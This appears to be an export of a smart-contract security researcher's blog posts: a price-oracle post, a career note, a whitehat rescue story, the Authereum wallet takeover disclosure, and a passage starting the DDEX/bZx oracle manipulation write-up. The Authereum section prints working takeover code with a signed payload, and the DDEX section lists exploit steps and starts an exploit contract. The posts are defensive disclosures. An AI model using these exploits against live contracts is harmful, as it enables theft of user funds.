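// medianPrice aggregates reported prices: it requires at least
// minReports submissions and returns the median, so a minority of
// misbehaving reporters can't move the final price far.
func medianPrice(reports []float64, minReports int) (float64, error) {
	if len(reports) < minReports {
		return 0, errors.New("not enough reports")
	}
	// Sort a copy so the caller's slice is left untouched.
	sorted := append([]float64(nil), reports...)
	sort.Float64s(sorted)
	mid := len(sorted) / 2
	if len(sorted)%2 == 1 {
		return sorted[mid], nil
	}
	return (sorted[mid-1] + sorted[mid]) / 2, nil
}

func main() {
	// One of five reporters is compromised and reports a wild price.
	reports := []float64{399.5, 400.0, 400.2, 401.0, 99999.0}
	price, _ := medianPrice(reports, 3)
	fmt.Println(price) // 400.2
}
```

Even with one reporter submitting 99999.0, the median stays at 400.2; compromising the price requires corrupting a majority of reporters.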

Conclusion

Price oracles are a critical, but often overlooked, component of DeFi security. Safely using price oracles is hard and there’s plenty of ways to shoot both yourself and your users in the foot. In this post, we covered past examples of price oracle manipulation and established that reading price information during the middle of a transaction may be unsafe and could result in catastrophic financial damage. We also discussed a few techniques other projects have used to combat price oracle manipulation in the past. In the end though, every situation is unique and you might find yourself unsure whether you’re using a price oracle correctly. If this is the case, feel free to reach out for advice!

Special thanks to Dan Robinson and Georgios Konstantopoulos for reviewing this post, and to @zdhu_ and mongolsteppe for pointing out an error.

]]>
<![CDATA[Changing Lanes]]>https://samczsun.com/changing-lanes/5f7cfdfac9ce5800018a6968Fri, 09 Oct 2020 15:19:06 GMT

In early 2020, I was given an opportunity to join Trail of Bits over the summer. I was familiar with the high quality of work that they produced so I happily accepted the opportunity to meet and work with some of the brightest minds in software security.

During my time at Trail of Bits I worked on numerous engagements with coworkers who were experts in all sorts of subjects, from cryptography to binary analysis to formal verification. It was a truly great experience to be able to collaborate with and learn from so many talented individuals.

When I wasn’t helping clients secure their software, I spent time improving Slither, a static code analyzer for Solidity, alongside Josselin Feist. Although program analysis isn’t my strong suit, I was able to improve quickly thanks to Josselin’s mentorship and I’m proud to have been able to contribute back by implementing support for inline assembly as well as identifying and fixing a handful of internal bugs.

However, as summer drew to a close, I began considering what I wanted to do next. At the same time, Matt Huang from Paradigm reached out with an offer to meet the team. Not knowing much about Paradigm beyond the fact that two people I respected, Dan Robinson and Georgios Konstantopoulos, worked there, I figured it couldn’t hurt to chat.

After talking with Matt, Fred Ehrsam, Alana Palmedo, Gus Coldebella, and the others on the team, I realized that Paradigm had amassed a group of extremely talented people, each a leader in their respective fields. The thought of being able to work alongside them and learn from their experiences was extremely exciting.

As such, I’m happy to share that I’m joining Paradigm as a Research Partner. My responsibilities will include helping evaluate the security posture of potential portfolio companies, assisting current portfolio companies, advancing the overall security of the Ethereum ecosystem, but most importantly, learning new things.

I’d like to thank Dan Guido and everyone at Trail of Bits for having me this summer as well as Matt Huang and everyone at Paradigm for bringing me on board. I’d also like to thank the community for your continued support. I wouldn’t be here without you, and I hope you’ll join me in facing whatever the future holds.

]]>
<![CDATA[Escaping the Dark Forest]]>https://samczsun.com/escaping-the-dark-forest/5f6c30088fb3100001de1691Thu, 24 Sep 2020 16:29:39 GMT

I was about to wrap up for the night when I decided to take another look at some smart contracts.

I wasn’t expecting anything interesting, of course. Over the past few weeks I had seen countless yield farming clones launch with the exact same pitch: stake your tokens with us and you could be the next cryptocurrency millionaire. Most were simply forks of well-audited code although some tweaked bits and pieces, sometimes with catastrophic results.

But amidst all of the noise there was some code I hadn’t seen before. The contract held over 25,000 Ether, worth over 9,600,000 USD at the time, and would be a very juicy payday for anyone who managed to find a bug in its logic.

I quickly looked through the code for where Ether is transferred out and found two hits. One of them transferred the Ether to a hardcoded token address, so that could be ignored. The second was a burn function that transferred Ether to the sender. After tracing the usage of this function, I discovered that it would be trivial for anyone to mint tokens to themselves for free, but then burn them in exchange for all of the Ether in the contract. My heart jumped. Suddenly, things had become serious.

Some digging revealed that the contract I had found was part of Lien Finance’s protocol. Unfortunately, their team was anonymous! The only IM platform they supported was Telegram, and I couldn’t be sure that the admins of that channel were actually protocol developers or just a few early supporters. The last thing I wanted to do was accidentally leak the exploit to the wrong person.

After browsing their website a little while longer, I noticed that they had worked with ConsenSys Diligence and CertiK for an audit. This seemed like a good avenue, since both ConsenSys and CertiK must have interacted with the developers during their audits. I quickly pinged maurelian on Telegram.

You never want to be on the receiving end of this message

Unfortunately, time ticked on, my heart kept pounding, but there was no response from maurelian. It seemed like he had already gone to sleep. Desperate, I sent a message to the ETHSecurity Telegram channel.

Artist's rendering of the message, since I deleted the original

Within minutes, I got a message from someone I’d worked with quite a few times in the past - Alex Wade.


My head had just hit the pillow when I got a knock on my door. It was my roommate: “Sam’s in the ETHSec Telegram asking for anyone from Diligence.”

It was, in fact, a long night

Knowing Sam, this couldn’t be good. I found a channel we’d set up with Lien a few months ago and an email address. Better than nothing, given their team was anon.

I was still half asleep. Sam, not wanting to commit details to text, asked for a Zoom call. Groggily wishing I was back in bed, I attempted to gauge the severity of the situation:

Five minutes later, it was clear that the situation called for coffee

Sam and I reviewed the code together. By this point, Sam had already prepared a sample exploit and was able to confirm the issue on his machine. The conversation quickly turned to discussing options:

  1. Attempt to exploit the issue ourselves.
  2. Reach out to Lien and have them go public, urging users to withdraw.

Neither of these were appealing options. The first was risky because, as discussed in Ethereum is a Dark Forest by Dan Robinson and Georgios Konstantopoulos, the possibility of our transactions getting frontrun was very real. The second option was similarly risky, as a public announcement would draw attention to the problem and create a window of opportunity for attackers. We needed a third option.

Recalling a section from Ethereum is a Dark Forest, Sam reached out to Scott Bigelow:

If you find yourself in a situation like this, we suggest you reach out to Scott Bigelow, a security researcher who has been studying this topic and has a prototype implementation for a better obfuscator.

After participating in the recovery attempt from Ethereum is a Dark Forest, which ultimately lost to front-runners, I was hungry for a re-match. I’ve spent time monitoring front-running and designing a simple system that seemed able to fool generalized front-runners, at least for the $200 I’d been able to test it with. When Sam reached out to me in the late evening with the innocent-sounding “mind staying up for another hour or so”, I couldn’t wait to try it out! I was already working it out: how I’d make a few tweaks, stay up a couple hours, feel a sense of accomplishment having helped rescue and return a few thousand dollars of user funds, and get a good night’s sleep.

Those plans immediately fell apart when Sam shared the contract with me: ~25,000 ETH, valued at $9.6M, at stake. For as much as I wanted that rematch, $9.6M was way outside my humble script’s weight class.


For the past few months, I had been trying to establish contacts with miners for this very purpose: white-hat transaction cooperation. If ever there was a time to appeal to a miner to include a transaction without giving front-runners the chance to steal it, it was now. Luckily, Tina and I have worked together over the past few months on establishing this cooperation. It seemed like a slim chance at the time, but it was worth a shot: let’s bring Tina into the rescue attempt to work with a mining pool to mine a private transaction.


I had just evacuated from the Bobcat forest fire and was sipping on unknown beachy drinks zoning out to the monotonic sound of dark Pacific waves, when a Telegram DM from Sam buzzed me back to a darker reality: “funds at risk, frontrunnable”. Over the last few weeks, I had been collaborating with Sam and Scott on a research project on MEV and could already guess their ask before they sent it: a direct channel to shield a whitehat tx from getting sniped by the “advanced predators” in the mempool’s “dark forest”.

Since this was a risky move that entailed exposing our strategy to miners, we decided we should first try to get the greenlight from the anonymous Lien team. While Alex was trying to get in contact via ConsenSys-internal channels, we tried to loop in CertiK as well.

I realized it might take another 4 hours before CertiK's US-based auditors woke up, yet the clock was ticking. Knowing little about CertiK beyond the fact that it had serviced quite a few Asian projects, I tried to reach the CertiK China team to arbitrage the time zone difference. I blasted a casual-sounding message in the “DeFi the World” and “Yellow Hats” WeChat groups. Four leads slid into my DMs independently within 30 minutes, confirming that the WeChat ID I had connected with was indeed the real Zhaozhong Ni, CTO of CertiK. I was added to a WeChat group with 5 CertiK team members, yet at this point I was still not in a position to disclose the project nor the vulnerability. To minimize the exposure and potential liability, we could only invite one member from CertiK to join our whitehat operation. After passing a final verification via official email, Georgios Delkos, the engineering lead at CertiK, joined our call.

With Georgios’s help, Alex was able to quickly get in contact with the Lien team and verify their identity. We brought them up-to-speed on the current situation and asked for their permission to try working directly with a mining pool to rescue the vulnerable funds. After some deliberation, the Lien team agreed that the risk from trying to rescue the funds directly or publishing a warning was too high, and gave the go-ahead to continue.

Now we needed to identify a mining pool that had the infrastructure ready in place and would be willing to cooperate with us ASAP. Which mining pool should we tap? Which contact from the pool would be in a position to make technical decisions swiftly that help us beat the clock?

SparkPool came to mind, as I knew they had been working on a piece of public infrastructure called Taichi Network that could easily offer what we needed. I decided to ping Shaoping Zhang, SparkPool’s co-founder, who had helped me investigate mempool events in the past.

Half an hour later, Shaoping responded: “You mean do we have a whitelist service for transactions? Sorry, we don’t.” Oops, something was lost in translation: “whitehat” and “whitelist” sound similar in Chinese.

“There’s 10mn dollar worth of funds at risk. samczsun is on the line.” I tried again to communicate the situation without revealing any specifics.

“Are you guys saving the world again? Do you need help from our mining pool?” To my surprise and great relief, Shaoping jokingly extended an offer to help. After official email verification, Shaoping popped into our marathon Zoom call with the support of a roomful of SparkPool devs.


After lunch, just when I was about to take a nap, I received a message from Tina: “Has SparkPool ever helped with whitehat transactions??” I mistook it for whitelisting a transaction at first. No whitehats had approached us before, and we were not familiar with what “whitehat transactions” entailed. After Tina explained it in more detail, I realized that what they needed was a private transaction service, i.e. the whitehats wanted to send transactions to save a DeFi contract, but in order to prevent getting front-run, they needed a mining pool to include the transaction without broadcasting it.

We had been working on a “private transaction” feature on our Taichi Network, which was still under development and had not been tested. I brought the whitehats’ request to our development team, and explained the urgency: our private transaction feature needed to be in production within a few hours. Our devs said they could try their best to finish in time, and we immediately got to work. We finished development of the private transaction feature in 2 hours, and then spent some time fixing bugs.

After we completed our internal testing, we sent the whitehat.taichi.network endpoint to Scott Bigelow to deliver the whitehat payload.
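Conceptually, the service SparkPool stood up reduces to one rule: a private transaction is held out of gossip entirely and first becomes visible when it appears in a block the pool itself mines. A toy model of that flow (purely illustrative, not SparkPool's actual implementation):

```python
# Toy model of a miner-operated private transaction service: a private tx
# is never gossiped to peers, so it first becomes visible when it appears
# in one of the pool's own blocks. Illustrative sketch only.

class MinerPool:
    def __init__(self):
        self.public_mempool = []   # gossiped to every peer
        self.private_queue = []    # known only to this pool

    def submit_public(self, tx):
        self.public_mempool.append(tx)

    def submit_private(self, tx):
        # The whitehat endpoint: accept the tx but do NOT broadcast it.
        self.private_queue.append(tx)

    def gossip(self):
        # What front-runners monitoring the mempool can see.
        return list(self.public_mempool)

    def mine_block(self):
        # Private txs are revealed only at inclusion time.
        block = self.private_queue + self.public_mempool
        self.private_queue, self.public_mempool = [], []
        return block

pool = MinerPool()
pool.submit_public("ordinary-tx")
pool.submit_private("whitehat-rescue-tx")
assert "whitehat-rescue-tx" not in pool.gossip()   # invisible before inclusion
assert "whitehat-rescue-tx" in pool.mine_block()   # visible only in the block
```

Because the transaction never enters the public mempool, generalized front-runners have nothing to copy until it is already mined.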


While SparkPool was working to deliver this brand new whitehat API, Sam and I were finishing the script to generate 4 sequential signed transactions. Processing these transactions in order would not withdraw the ~25,000 ETH itself, but would transfer 30,000 SBT+LBT tokens (which were “falsely” created) to the Lien team, allowing them to submit the final transaction to convert these tokens back into ETH. By transferring the infinitely mintable SBT+LBT tokens to Lien instead of ETH, we used more transactions to obscure how the attack worked from generalized front-runners (in case of a re-org), and I was able to avoid incurring $9.6M of income, even if only for a moment.

Once we had generated the 4 signed transactions, Sam and I spent a long time verifying their combined behavior using a variety of multi-call transaction simulation tools. These 4 transactions, less than 1.5KB of data in total, were ready to heist $9.6M of assets, so long as no one but SparkPool saw them until it was too late.

I tested SparkPool’s whitehat endpoint with a meaningless transaction, and it worked exactly as expected: the transaction was not seen in the mempool, then suddenly appeared as part of a SparkPool block! It was like watching water vapor turn directly into ice without that pesky liquid phase.

After adapting the transaction-creation script to feed the transactions directly to SparkPool’s new endpoint, it was time. I hesitated for a moment, but this was absolutely our best effort. We might lose $9.6M, but there would be no regrets: I hit “run” in IntelliJ. I’m not sure why, but I expected it to take a while, as if the node would understand the gravity of the situation and take its time. It did not; the transactions were sent in a matter of milliseconds.

Everyone on the call began refreshing Etherscan with such vigor that I wondered if the Etherscan team would see a 3-minute spike in traffic. Since only SparkPool had the transactions, and only a portion of SparkPool’s hash rate was dedicated to this purpose, there was nothing to do but sweat and wait. Each block that appeared from another miner mocked us. Someone on the call would announce the miner to nervous chuckles. The ~15 blocks it took before our transactions were included felt like hours, but finally, we had our immaculate transactions: mined, in order, not reverted.

We watched with relief as more and more blocks were built on top of ours and our concerns about block re-orgs quickly faded. The Lien team was now in possession of enough SBT+LBT tokens to liquidate their entire system, and Sam went to coordinate the final phase of the rescue.


Now that we had successfully transferred the tokens to Lien and there was no sign of any frontrunning, attempted or otherwise, we quickly pinged them with the good news. They confirmed that they received the tokens and immediately sent out a transaction to withdraw the bulk of the ether stored in the contract. Seconds later, a pending transaction appeared on Etherscan.

As we watched the loading indicator spin, I took the opportunity to reflect upon the events that led to this moment. What had started as a quick glance at some contracts had turned into a full-blown war room that pulled in experts from around the world. Without Alex and Georgios, we wouldn’t have been able to make contact with the Lien developer. Without Scott, we would’ve been going into the rescue blind. Without Tina, we wouldn’t have been able to get in contact with CertiK or SparkPool. Without SparkPool, we would’ve been doomed to repeat the history that Dan had written about just weeks ago.

And yet on a late Tuesday night, our unlikely group united under a common cause and worked tirelessly to try and ensure that over 9.6 million dollars would be returned to their rightful owners. All of our efforts over the last 7 hours led to this single pending transaction and the spinning dots that came with it.

When the loading indicator finally turned into a green checkmark, the tense silence on the call gave way to a collective sigh of relief.

Escaping the Dark Forest

We had escaped the dark forest. [1]


This post was the culmination of the hard work of many people. Special thanks to Alex Wade, Scott Bigelow, Tina Zhen, Georgios Delkos, and SparkPool for being there when the ecosystem needed you most, as well as Alex Obadia and Dan Robinson for reviewing this post and providing feedback.

If you’re interested in the technical details behind the exploit, click here to learn more. If for some reason you still haven’t read Ethereum is a Dark Forest, you should definitely do so too.

[1] The transaction

]]>
<![CDATA[Authereum, meet Parity]]>https://samczsun.com/authereum-meet-parity/5e4b1e97f66f5500017aee56Wed, 19 Feb 2020 03:54:32 GMTtl;dr

The Authereum wallet contained a bug which would allow an attacker to take over any wallet at any time. The Authereum team exploited this bug in order to force an upgrade on all user wallets, and as a result no funds were lost.

Authereum

Authereum is a project which aims to make using Ethereum dApps easier for everyday users. In order to achieve this goal, they've built a set of smart contracts which act as a smart wallet.

Each smart wallet is owned by a set of admin keys, and the first admin key is generated when a user creates their account on Authereum. Naturally, an admin key can add a new admin key.

Authereum wallets also allow relayers to submit transactions so the end user doesn't need to worry about paying for gas. In order to make sure evil relayers can't do bad things, the Authereum wallet verifies that the relayed transaction is signed by an admin key.

How to relay a transaction

Let's take a look at how a relayer might use Authereum meta transactions to relay an ERC20 approval.

First, the user provides the encoded transaction(s). This consists of the target contract, the amount of ether to be sent, the gas limit, and the transaction data. For an ERC20 approval, that might look something like this:

bytes memory encodedTransaction = abi.encode(
	0x6B175474E89094C44Da98b954EedeAC495271d0F, // dai
	0,
	uint(-1),
	abi.encodeWithSignature(
		"approve(address,uint256)",
		0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B, // approve vitalik
		uint(-1) // for all my dai
	)
);
Don't spend it all in one place

Next, the user specifies the minimum gas price that they would like this transaction to be sent at, along with an estimated gas overhead. The user also specifies whether they want to pay in a token other than ETH, and at what rate ETH converts to the token.

Finally, the user provides a signature, signed with their admin key. Specifically, it's a signature for the following data.

bytes32 hash = keccak256(abi.encodePacked(
    "\x19Ethereum Signed Message:\n32",
    keccak256(abi.encode(
        address(wallet),
        wallet.executeMultipleAuthKeyMetaTransactions.selector,
        wallet.getChainId(),
        wallet.nonce(),
        [encodedTransaction],
        gasPrice,
        gasOverhead,
        feeTokenAddress,
        feeTokenRate
    ))
));
Source

When the relayer has been provided with all of the necessary information, they submit a transaction to executeMultipleAuthKeyMetaTransactions. That function looks something like this:

function executeMultipleAuthKeyMetaTransactions(
	bytes[] memory _transactions,
	uint256 _gasPrice,
	uint256 _gasOverhead,
	address _feeTokenAddress,
	uint256 _feeTokenRate,
	bytes memory _transactionMessageHashSignature
)
	public
	returns (bytes[] memory)
{
	uint256 _startGas = gasleft();

	(bytes32 _transactionMessageHash, bytes[] memory _returnValues) = _atomicExecuteMultipleMetaTransactions(
		_transactions,
		_gasPrice,
		_gasOverhead,
		_feeTokenAddress,
		_feeTokenRate
	);

	// Validate the signer
	_validateAuthKeyMetaTransactionSigs(
		_transactionMessageHash, _transactionMessageHashSignature
	);

	if (_shouldRefund(_transactions)) {
	  _issueRefund(_startGas, _gasPrice, _gasOverhead, _feeTokenAddress, _feeTokenRate);
	}

	return _returnValues;
}
Source

At this point, the Authereum wallet will atomically execute all of the transactions, verify that the transactions were signed by an admin key, and then issue a refund if necessary.

Notice anything wrong?

Meta all the things

If admins could use meta transactions to relay some transactions, it sure would be nice if they could use meta transactions to relay all transactions. However, the only surefire way to make sure that an admin sent a transaction is to check msg.sender, and that doesn't work in a meta transaction.

Actually, if we think about it, the wallet represents the admin. Only the admin can authorize transactions to be sent. That means that if the wallet is the caller, then the admin must have authorized the wallet to call itself, right? So maybe we can treat the wallet as a pseudo-admin of sorts, letting it do some of the scary privileged stuff.

function addAuthKey(address _authKey) external onlyAuthKeySenderOrSelf {
	require(authKeys[_authKey] == false, "BA: Auth key already added");
	authKeys[_authKey] = true;
	numAuthKeys += 1;
	emit AuthKeyAdded(_authKey);
}
Source

Hopefully there's no way for any random person to make the wallet call an arbitrary function on itself, because that would really suck.

Oops

Oops:

bytes memory exploitTransaction = abi.encode(
	wallet,
	0,
	uint(-1),
	abi.encodeWithSignature(
		"addAuthKey(address)",
		0x32993258F4Bb0f00e3C25cF00a9b490BF86509D8 // the hacker's address
	)
);

Oops oops oops:

bytes32 hash = keccak256(abi.encodePacked(
    "\x19Ethereum Signed Message:\n32",
    keccak256(abi.encode(
        address(wallet),
        wallet.executeMultipleAuthKeyMetaTransactions.selector,
        wallet.getChainId(),
        wallet.nonce(),
        [exploitTransaction],
        uint(0),
        uint(0),
        address(0),
        uint(0)
    ))
));

Oopsoopsoopsoopsoopsoopsoops:

wallet.executeMultipleAuthKeyMetaTransactions(
	[exploitTransaction],
	0,
	0,
	address(0),
	0,
	// signed by the hacker
	hex"274a0272b7dc3e465a7729bfc8b5e57bbf2e2e0a58e223680350564bbea20b7c7a3050f1ba533673dca92342f058ea178b7fecca02efa30a4b9ff082c7b086aa1c"
);

The full attack is available in this Gist.
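Stripped of the Solidity details, the root cause is an ordering bug: the wallet executed the relayed calls before validating the signature against its auth keys, so a relayed call to addAuthKey could make the attacker's own signature valid retroactively. A toy model of that ordering (hypothetical Python sketch, not Authereum's actual code):

```python
# Toy model of the execute-then-validate bug. Because the relayed call runs
# first, a call to addAuthKey(attacker) makes the attacker an auth key by
# the time the signature is checked. Illustrative only.

class Wallet:
    def __init__(self, admin):
        self.auth_keys = {admin}

    def _add_auth_key(self, key):           # callable by the wallet itself
        self.auth_keys.add(key)

    def execute_meta_tx_vulnerable(self, call, signer):
        call(self)                          # 1. execute first...
        assert signer in self.auth_keys     # 2. ...validate afterwards
        return True

    def execute_meta_tx_fixed(self, call, signer):
        assert signer in self.auth_keys     # validate *before* executing
        call(self)
        return True

attacker = "0xhacker"
w = Wallet(admin="0xowner")
# Vulnerable ordering: the attacker self-authorizes mid-flight.
w.execute_meta_tx_vulnerable(lambda s: s._add_auth_key(attacker), signer=attacker)
assert attacker in w.auth_keys              # takeover succeeded

w2 = Wallet(admin="0xowner")
try:
    w2.execute_meta_tx_fixed(lambda s: s._add_auth_key(attacker), signer=attacker)
except AssertionError:
    pass
assert attacker not in w2.auth_keys         # the fixed ordering rejects it
```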

Impact

Fortunately, Authereum just launched and there wasn't much to steal yet.

Solution

The Authereum team fixed the bug by moving the signature check so that it runs before the transactions are executed.

function executeMultipleAuthKeyMetaTransactions(
	bytes[] memory _transactions,
	uint256 _gasPrice,
	uint256 _gasOverhead,
	address _feeTokenAddress,
	uint256 _feeTokenRate,
	bytes memory _transactionMessageHashSignature
)
	public
	returns (bytes[] memory)
{
	uint256 _startGas = gasleft();

	// Hash the parameters
	bytes32 _transactionMessageHash = keccak256(abi.encode(
		address(this),
		msg.sig,
		getChainId(),
		nonce,
		_transactions,
		_gasPrice,
		_gasOverhead,
		_feeTokenAddress,
		_feeTokenRate
	)).toEthSignedMessageHash();

	// Validate the signer
	// NOTE: This must be done prior to the _atomicExecuteMultipleMetaTransactions() call for security purposes
	_validateAuthKeyMetaTransactionSigs(
		_transactionMessageHash, _transactionMessageHashSignature
	);

	(, bytes[] memory _returnValues) = _atomicExecuteMultipleMetaTransactions(
		_transactions,
		_gasPrice,
		_gasOverhead,
		_feeTokenAddress,
		_feeTokenRate
	);

	if (_shouldRefund(_transactions)) {
	  _issueRefund(_startGas, _gasPrice, _gasOverhead, _feeTokenAddress, _feeTokenRate);
	}

	return _returnValues;
}

Further Reading

]]>
<![CDATA[Taking undercollateralized loans for fun and for profit]]>https://samczsun.com/taking-undercollateralized-loans-for-fun-and-for-profit/5d708d0b5f582e0001bf6717Mon, 30 Sep 2019 16:20:35 GMTtl;dr

By relying on an on-chain decentralized price oracle without validating the rates returned, DDEX and bZx were susceptible to atomic price manipulation. This would have resulted in the loss of liquid ETH in the ETH/DAI market for DDEX, and loss of all liquid funds in bZx. Fortunately, no funds were actually lost.

What is decentralized lending?

First, let's talk about traditional lending. When you take out a loan, you typically need to provide some sort of collateral so that if you default on your loan, the lender can then seize the collateral. In order to determine how much collateral you need to supply, the lender typically knows or can reliably calculate the fair market value (FMV) of the collateral.

In decentralized lending, the same process occurs except now the lender is a smart contract that is isolated from the outside world. This means that it can't simply "know" the FMV of whatever collateral you're trying to provide.

To solve this problem, developers instruct the smart contract to query an oracle, which accepts the address of a token and returns the current price of that token in a desired currency (for example, ETH or USD). Different DeFi projects have taken different approaches to implementing this oracle, but they can generally all be classified in one of five ways (although some implementations blur the lines more than others):

  1. Off-chain Centralized Oracle
    This type of oracle simply accepts new prices from an off-chain source, typically an account controlled by the project. Due to the need to quickly update the oracle with new exchange rates, the account is typically an EOA and not a multisig. There may be some sanity checking to ensure that prices don't fluctuate too wildly. Compound Finance and Synthetix mainly use this type of oracle for most assets
  2. Off-chain Decentralized Oracle
    This type of oracle accepts new prices from multiple off-chain sources and merges the values through a mathematical function, such as an average. In this model, a multisig wallet is typically used to manage the list of authorized sources. Maker uses this type of oracle for ETH and other assets
  3. On-chain Centralized Oracle
    This type of oracle determines the price of assets using an on-chain source, such as a DEX. However, only a central authority can trigger the oracle to read from the on-chain source. Like an off-chain centralized oracle, this type of oracle requires rapid updates and as such the triggering account is likely an EOA and not a multisig. dYdX and Nuo use this type of oracle for certain assets
  4. On-chain Decentralized Oracle
    This type of oracle determines the price of assets using an on-chain source, but can be updated by anyone. There may be some sanity checking to ensure that prices don't fluctuate too wildly. DDEX uses this type of oracle for DAI, while bZx uses this type of oracle for all assets
  5. Constant Oracle
    This type of oracle simply returns a constant value, and is typically used for stablecoins. Nearly all projects mentioned above use this type of oracle for USDC due to its guaranteed peg

The problem

While searching for additional vulnerable projects, I came across this tweet.

Someone asked for clarification, and the Uniswap project responded with the following.

These tweets explain the problem very clearly, but it's important to note that this problem exists for any oracle which can provide the FMV on-chain, not just Uniswap.

In general, if a price oracle is completely decentralized, then an attacker can manipulate the apparent price at a specific instant with minimal to no loss in slippage fees. If an attacker can then convince a DeFi dApp to check the oracle at the instant when the apparent price has been manipulated, then they can cause significant harm to the system. In the case of DDEX and bZx, it was possible to take out a loan that appeared to be sufficiently collateralized, but was in fact undercollateralized.

DDEX (Hydro Protocol)

DDEX is a decentralized exchange platform, but the team is in the process of expanding into decentralized lending so that they can offer their users the ability to create leveraged long and short positions. They're currently beta testing their decentralized margin exchange.

On September 9th 2019, DDEX added DAI as an asset to their margin trading platform and enabled the ETH/DAI market. For the oracle, they specified this smart contract which returns the value of DAI/USD by calculating PriceOfETHInUSD/PriceOfETHInDAI. The value of ETH/USD is read from the Maker oracle, while the value of ETH/DAI is read from either Eth2Dai, or if the spread is too great, Uniswap.

function peek()
	public
	view
	returns (uint256 _price)
{
	uint256 makerDaoPrice = getMakerDaoPrice();

	if (makerDaoPrice == 0) {
		return _price;
	}

	uint256 eth2daiPrice = getEth2DaiPrice();

	if (eth2daiPrice > 0) {
		_price = makerDaoPrice.mul(ONE).div(eth2daiPrice);
		return _price;
	}

	uint256 uniswapPrice = getUniswapPrice();

	if (uniswapPrice > 0) {
		_price = makerDaoPrice.mul(ONE).div(uniswapPrice);
		return _price;
	}

	return _price;
}

function getEth2DaiPrice()
	public
	view
	returns (uint256)
{
	if (Eth2Dai.isClosed() || !Eth2Dai.buyEnabled() || !Eth2Dai.matchingEnabled()) {
		return 0;
	}

	uint256 bidDai = Eth2Dai.getBuyAmount(address(DAI), WETH, eth2daiETHAmount);
	uint256 askDai = Eth2Dai.getPayAmount(address(DAI), WETH, eth2daiETHAmount);

	uint256 bidPrice = bidDai.mul(ONE).div(eth2daiETHAmount);
	uint256 askPrice = askDai.mul(ONE).div(eth2daiETHAmount);

	uint256 spread = askPrice.mul(ONE).div(bidPrice).sub(ONE);

	if (spread > eth2daiMaxSpread) {
		return 0;
	} else {
		return bidPrice.add(askPrice).div(2);
	}
}

function getUniswapPrice()
	public
	view
	returns (uint256)
{
	uint256 ethAmount = UNISWAP.balance;
	uint256 daiAmount = DAI.balanceOf(UNISWAP);
	uint256 uniswapPrice = daiAmount.mul(10**18).div(ethAmount);

	if (ethAmount < uniswapMinETHAmount) {
		return 0;
	} else {
		return uniswapPrice;
	}
}

function getMakerDaoPrice()
	public
	view
	returns (uint256)
{
	(bytes32 value, bool has) = makerDaoOracle.peek();

	if (has) {
		return uint256(value);
	} else {
		return 0;
	}
}
Source

In order to trigger an update and cause the oracle to refresh its stored value, a user simply has to call updatePrice().

function updatePrice()
	public
	returns (bool)
{
	uint256 _price = peek();

	if (_price != 0) {
		price = _price;
		emit UpdatePrice(price);
		return true;
	} else {
		return false;
	}
}
Source

The attack

Let's assume we can manipulate the apparent value of DAI/USD. If this is the case, we would like to use this to borrow all of the ETH in the system while providing as little DAI as possible. To achieve this, we can either lower the apparent value of ETH/USD or increase the apparent value of DAI/USD. Since we're already assuming that the apparent value of DAI/USD is manipulable, we'll choose the latter.

To increase the apparent value of DAI/USD, we can either increase the apparent value of ETH/USD or decrease the apparent value of ETH/DAI. For all intents and purposes, manipulating Maker's oracle is impossible, so we'll try decreasing the apparent value of ETH/DAI.

The oracle will calculate the value of ETH/DAI as reported by Eth2Dai by taking the average of the current asking price and the current bidding price. In order to decrease this value, we'll need to lower the current bidding price by filling existing orders and then lower the current asking price by placing new orders.

However, this requires a significant initial investment (as we need to fill orders and then make an equivalent number of new orders) and is non-trivial to implement. On the other hand, we can drop the Uniswap price simply by buying a large amount of DAI from Uniswap. As such, we'll aim to bypass the Eth2Dai logic and manipulate the Uniswap price.

In order to bypass Eth2Dai, we need to manipulate the magnitude of the spread. We can do this in one of two ways:

  1. Clear out one side of the orderbook while leaving the other alone. This causes the spread to go strongly positive
  2. Force a crossed orderbook by listing an extreme buy or sell order. This causes the spread to go negative.

While option 2 would result in no losses from taking unfavorable orders, the use of SafeMath disallows a crossed orderbook and as such is unavailable to us. Instead, we'll force a large positive spread by clearing out one side of the orderbook. This will cause the DAI oracle to fall back to Uniswap to determine the price of DAI. Then, we can cause the Uniswap price of ETH/DAI to drop by buying a large amount of DAI. Once the apparent value of DAI/USD has been manipulated, it's trivial to take out a loan as usual.
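The Uniswap leg of this manipulation is just constant-product arithmetic. The oracle quotes DAI per ETH as daiAmount/ethAmount, so buying a fraction f of the pool's DAI shrinks the quote by a factor of (1 − f)². A sketch with illustrative reserve sizes chosen to match the ~213 DAI/ETH starting rate in the demo:

```python
# Constant-product sketch of the Uniswap leg of the manipulation.
# The DDEX oracle quotes DAI/ETH as dai_reserve / eth_reserve; buying DAI
# from the pool shrinks dai_reserve and grows eth_reserve simultaneously.
# Reserve sizes are illustrative, not the pool's real balances.

def buy_dai(eth_reserve, dai_reserve, fraction_of_dai_bought):
    k = eth_reserve * dai_reserve                  # x * y = k invariant
    dai_reserve *= (1 - fraction_of_dai_bought)    # DAI leaves the pool
    eth_reserve = k / dai_reserve                  # ETH paid in (fee ignored)
    return eth_reserve, dai_reserve

eth, dai = 1_000.0, 213_440.0                      # quote: 213.44 DAI/ETH
assert round(dai / eth, 2) == 213.44

eth, dai = buy_dai(eth, dai, 0.75)                 # buy 75% of the pool's DAI
# The quote falls by (1 - 0.75)^2 = 1/16: ~213 -> ~13 DAI/ETH, matching
# the "213 DAI/ETH to 13 DAI/ETH" drop described in the demo.
assert round(dai / eth, 2) == 13.34
```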

Demo

The following script will turn a profit of approximately 70 ETH by:

  1. Clearing out Eth2Dai's sell orders until the spread is large enough that the oracle rejects the price
  2. Buying more DAI from Uniswap, dropping the price from 213DAI/ETH to 13DAI/ETH
  3. Borrowing all the available ETH (~120) for a small amount of DAI (~2500)
  4. Selling the DAI we bought from Uniswap back to Uniswap
  5. Selling the DAI we bought from Eth2Dai back to Eth2Dai
  6. Resetting the oracle (don't want anyone else abusing our favorable rates)
contract DDEXExploit is Script, Constants, TokenHelper {
    OracleLike private constant ETH_ORACLE = OracleLike(0x8984F1CFf1d614a7404b0cfE97C6fa9110b93Bd2);
    DaiOracleLike private constant DAI_ORACLE = DaiOracleLike(0xeB1f1A285fee2AB60D2910F2786E1D036E09EAA8);
    
    ERC20Like private constant HYDRO_ETH = ERC20Like(0x000000000000000000000000000000000000000E);
    HydroLike private constant HYDRO = HydroLike(0x241e82C79452F51fbfc89Fac6d912e021dB1a3B7);
    
    uint16 private constant ETHDAI_MARKET_ID = 1;
    
    uint private constant INITIAL_BALANCE = 25000 ether;
    
    function setup() public {
        name("ddex-exploit");
        blockNumber(8572000);
    }
    
    function run() public {
        begin("exploit")
